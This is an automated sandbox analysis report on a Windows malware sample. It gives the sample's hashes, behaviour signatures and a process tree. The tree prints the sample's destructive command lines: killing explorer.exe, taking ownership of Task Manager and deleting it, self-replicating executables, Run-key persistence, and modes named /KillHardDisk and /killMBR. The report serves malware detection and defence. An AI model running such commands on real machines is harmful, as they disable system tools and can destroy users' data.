545c544c1dd84e9086f50a9620c0314679599c7f9265ee7f969d68ee8bf32bc7

Analysis

max time kernel
38s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
22/10/2023, 17:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Size

3.0MB
MD5

5dcc0a7f339e3d03202e41f07ff3dc30
SHA1

d341541478481dd1262302b538bbc196cfa964b6
SHA256

545c544c1dd84e9086f50a9620c0314679599c7f9265ee7f969d68ee8bf32bc7
SHA512

5bb5e0eb29aae7f2e69e7b2eec61ad01a6a0f03a7c011dbcae17d9dc674565be4095bbc8bc4125eb2267f219e32f7b5333494837b1cb012765c386d898908020
SSDEEP

49152:j495UciMmq/NhjX5p3JOCdLAweZnE5c965nqqIP2Itdy:jk5LhzACdLAlnE5co5nqqIP2Itdy

Score

7^/10

discovery persistence

Malware Config

Signatures

Executes dropped EXE 64 IoCs

pid	Process
4856	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
2312	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
2900	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
4168	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
3076	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
2832	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
4996	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
2700	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
1316	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
1360	NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
2240	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
2336	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
464	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
3488	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
5236	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
5272	NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
5288	NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
5408	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
5428	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
5444	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
5844	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
5856	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
5932	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
5940	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
6044	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
6056	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
5368	NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
5992	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
5796	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
6148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
4972	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
5608	NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
5648	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
6420	Conhost.exe
6996	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
7024	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
7052	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
7120	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
7136	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3059.exe
5776	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
1488	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
2092	NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
5320	NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
6200	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
3480	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
7240	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
7248	NEAS.5dcc0a7f339e3d03202e41f07ff3dc309.exe
7296	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
7336	NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
7276	NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
7288	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
7368	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
7392	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
7352	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
7472	NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe
7312	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3081.exe
7516	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
7524	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
7612	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
7536	NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
6244	cmd.exe
8232	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
8572	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30517.exe
8516	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3094.exe

Modifies file permissions 1 TTPs 32 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
11712	takeown.exe
14652	takeown.exe
12988	takeown.exe
13724	takeown.exe
6708	takeown.exe
13940	takeown.exe
10556	takeown.exe
12420	takeown.exe
6692	takeown.exe
11692	takeown.exe
13964	takeown.exe
14256	takeown.exe
15340	takeown.exe
15308	takeown.exe
12952	takeown.exe
13204	takeown.exe
12924	takeown.exe
12896	takeown.exe
16080	takeown.exe
16380	takeown.exe
15052	takeown.exe
11388	takeown.exe
10988	takeown.exe
13972	takeown.exe
14272	takeown.exe
8276	takeown.exe
14400	takeown.exe
14264	takeown.exe
13824	takeown.exe
11776	takeown.exe
12904	takeown.exe
13368	takeown.exe

Adds Run key to start application 2 TTPs 16 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Kills process with taskkill 52 IoCs

evasion

pid	Process
6268	taskkill.exe
8256	taskkill.exe
3360	taskkill.exe
8580	taskkill.exe
7924	taskkill.exe
7348	taskkill.exe
8428	taskkill.exe
8456	taskkill.exe
3276	taskkill.exe
8528	taskkill.exe
8544	taskkill.exe
6812	taskkill.exe
8140	taskkill.exe
8732	taskkill.exe
5836	taskkill.exe
4068	taskkill.exe
7628	taskkill.exe
9640	taskkill.exe
708	taskkill.exe
6544	taskkill.exe
8588	taskkill.exe
4740	taskkill.exe
5436	taskkill.exe
5180	taskkill.exe
7444	taskkill.exe
6580	taskkill.exe
10144	taskkill.exe
7112	taskkill.exe
4928	taskkill.exe
8844	taskkill.exe
8564	taskkill.exe
6716	taskkill.exe
7836	taskkill.exe
7328	taskkill.exe
3284	taskkill.exe
3392	taskkill.exe
9196	taskkill.exe
8556	taskkill.exe
5508	taskkill.exe
12504	taskkill.exe
1636	taskkill.exe
3812	taskkill.exe
7816	taskkill.exe
6052	taskkill.exe
10096	taskkill.exe
7548	taskkill.exe
7812	taskkill.exe
3440	taskkill.exe
8680	taskkill.exe
5108	taskkill.exe
9624	taskkill.exe
7848	taskkill.exe

Suspicious behavior: LoadsDriver 10 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
652	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeAssignPrimaryTokenPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeLockMemoryPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeIncreaseQuotaPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeMachineAccountPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeTcbPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSecurityPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeTakeOwnershipPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeLoadDriverPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSystemProfilePrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSystemtimePrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeProfSingleProcessPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeIncBasePriorityPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreatePagefilePrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreatePermanentPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeBackupPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeRestorePrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeShutdownPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeDebugPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeAuditPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSystemEnvironmentPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeChangeNotifyPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeRemoteShutdownPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeUndockPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSyncAgentPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeEnableDelegationPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeManageVolumePrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeImpersonatePrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreateGlobalPrivilege	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: 31	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: 32	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: 33	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: 34	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: 35	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreateTokenPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeAssignPrimaryTokenPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeLockMemoryPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeIncreaseQuotaPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeMachineAccountPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeTcbPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSecurityPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeTakeOwnershipPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeLoadDriverPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSystemProfilePrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSystemtimePrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeProfSingleProcessPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeIncBasePriorityPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreatePagefilePrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreatePermanentPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeBackupPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeRestorePrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeShutdownPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeDebugPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeAuditPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSystemEnvironmentPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeChangeNotifyPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeRemoteShutdownPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeUndockPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeSyncAgentPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeEnableDelegationPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeManageVolumePrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeImpersonatePrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: SeCreateGlobalPrivilege	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
Token: 31	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3260 wrote to memory of 4016	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	86
PID 3260 wrote to memory of 4016	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	86
PID 4016 wrote to memory of 3740	4016	cmd.exe	87
PID 4016 wrote to memory of 3740	4016	cmd.exe	87
PID 3260 wrote to memory of 1984	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	89
PID 3260 wrote to memory of 1984	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	89
PID 1984 wrote to memory of 1428	1984	cmd.exe	90
PID 1984 wrote to memory of 1428	1984	cmd.exe	90
PID 3260 wrote to memory of 2884	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	92
PID 3260 wrote to memory of 2884	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	92
PID 2884 wrote to memory of 1148	2884	cmd.exe	93
PID 2884 wrote to memory of 1148	2884	cmd.exe	93
PID 3260 wrote to memory of 1144	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	95
PID 3260 wrote to memory of 1144	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	95
PID 3740 wrote to memory of 1640	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	96
PID 3740 wrote to memory of 1640	3740	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	96
PID 1144 wrote to memory of 1928	1144	cmd.exe	97
PID 1144 wrote to memory of 1928	1144	cmd.exe	97
PID 3260 wrote to memory of 4924	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	99
PID 3260 wrote to memory of 4924	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	99
PID 1148 wrote to memory of 3436	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	100
PID 1148 wrote to memory of 3436	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	100
PID 4924 wrote to memory of 4048	4924	cmd.exe	698
PID 4924 wrote to memory of 4048	4924	cmd.exe	698
PID 3260 wrote to memory of 5056	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	183
PID 3260 wrote to memory of 5056	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	183
PID 1148 wrote to memory of 3168	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	105
PID 1148 wrote to memory of 3168	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	105
PID 3740 wrote to memory of 2064	3740	Process not Found	373
PID 3740 wrote to memory of 2064	3740	Process not Found	373
PID 3168 wrote to memory of 4856	3168	cmd.exe	107
PID 3168 wrote to memory of 4856	3168	cmd.exe	107
PID 4048 wrote to memory of 3728	4048	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe	110
PID 4048 wrote to memory of 3728	4048	NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe	110
PID 5056 wrote to memory of 4208	5056	cmd.exe	109
PID 5056 wrote to memory of 4208	5056	cmd.exe	109
PID 1148 wrote to memory of 3936	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	115
PID 1148 wrote to memory of 3936	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	115
PID 3260 wrote to memory of 4408	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	148
PID 3260 wrote to memory of 4408	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	148
PID 2064 wrote to memory of 2312	2064	cmd.exe	112
PID 2064 wrote to memory of 2312	2064	cmd.exe	112
PID 4856 wrote to memory of 2864	4856	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe	116
PID 4856 wrote to memory of 2864	4856	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe	116
PID 3740 wrote to memory of 384	3740	Process not Found	117
PID 3740 wrote to memory of 384	3740	Process not Found	117
PID 2312 wrote to memory of 4932	2312	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe	118
PID 2312 wrote to memory of 4932	2312	NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe	118
PID 4408 wrote to memory of 1780	4408	Conhost.exe	119
PID 4408 wrote to memory of 1780	4408	Conhost.exe	119
PID 3260 wrote to memory of 2984	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	121
PID 3260 wrote to memory of 2984	3260	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	121
PID 1148 wrote to memory of 708	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	466
PID 1148 wrote to memory of 708	1148	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	466
PID 2864 wrote to memory of 2900	2864	cmd.exe	125
PID 2864 wrote to memory of 2900	2864	cmd.exe	125
PID 1780 wrote to memory of 2128	1780	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	124
PID 1780 wrote to memory of 2128	1780	NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe	124
PID 4932 wrote to memory of 4168	4932	cmd.exe	127
PID 4932 wrote to memory of 4168	4932	cmd.exe	127
PID 2984 wrote to memory of 3612	2984	cmd.exe	141
PID 2984 wrote to memory of 3612	2984	cmd.exe	141
PID 708 wrote to memory of 3076	708	taskkill.exe	140
PID 708 wrote to memory of 3076	708	taskkill.exe	140

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe /protect 1698005182
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+519110.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
      4⤵
      PID:1640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe 1698005182
      4⤵
      PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe 1698005182
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        7⤵
        Executes dropped EXE
        
        PID:4168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+518587.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe
        8⤵
        
        PID:4260
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe+413579.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        8⤵
        
        PID:5168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe 1698005182
        8⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe 1698005182
        9⤵
        Executes dropped EXE
        
        PID:4972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /protect 1698005182
        10⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /protect 1698005182
        11⤵
        Executes dropped EXE
        
        PID:7296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe+26944.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30542.exe
        12⤵
        
        PID:10060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30544.exe 1698005182
        12⤵
        
        PID:9040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30542.exe 1698005182
        12⤵
        
        PID:5280
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30542.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30542.exe 1698005182
        13⤵
        
        PID:8612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:8852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /save 1698005182
        10⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /save 1698005182
        11⤵
        
        PID:8704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:8600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:3284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /autoup 1698005182
        10⤵
        
        PID:6624
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /autoup 1698005182
        11⤵
        Adds Run key to start application
        
        PID:9104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /killwindows 1698005182
        10⤵
        
        PID:1504
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /killwindows 1698005182
        11⤵
        
        PID:11136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:12168
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:6708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:6020
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /KillHardDisk 1698005182
        10⤵
        
        PID:11600
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /KillHardDisk 1698005182
        11⤵
        
        PID:13540
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /killMBR 1698005182
        10⤵
        
        PID:7064
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /killMBR 1698005182
        11⤵
        
        PID:15960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe /protect 1698005182
        10⤵
        
        PID:16300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3055.exe 1698005182
        8⤵
        
        PID:768
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /save 1698005182
        6⤵
        
        PID:4676
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /protect 1698005182
        6⤵
        
        PID:2248
        
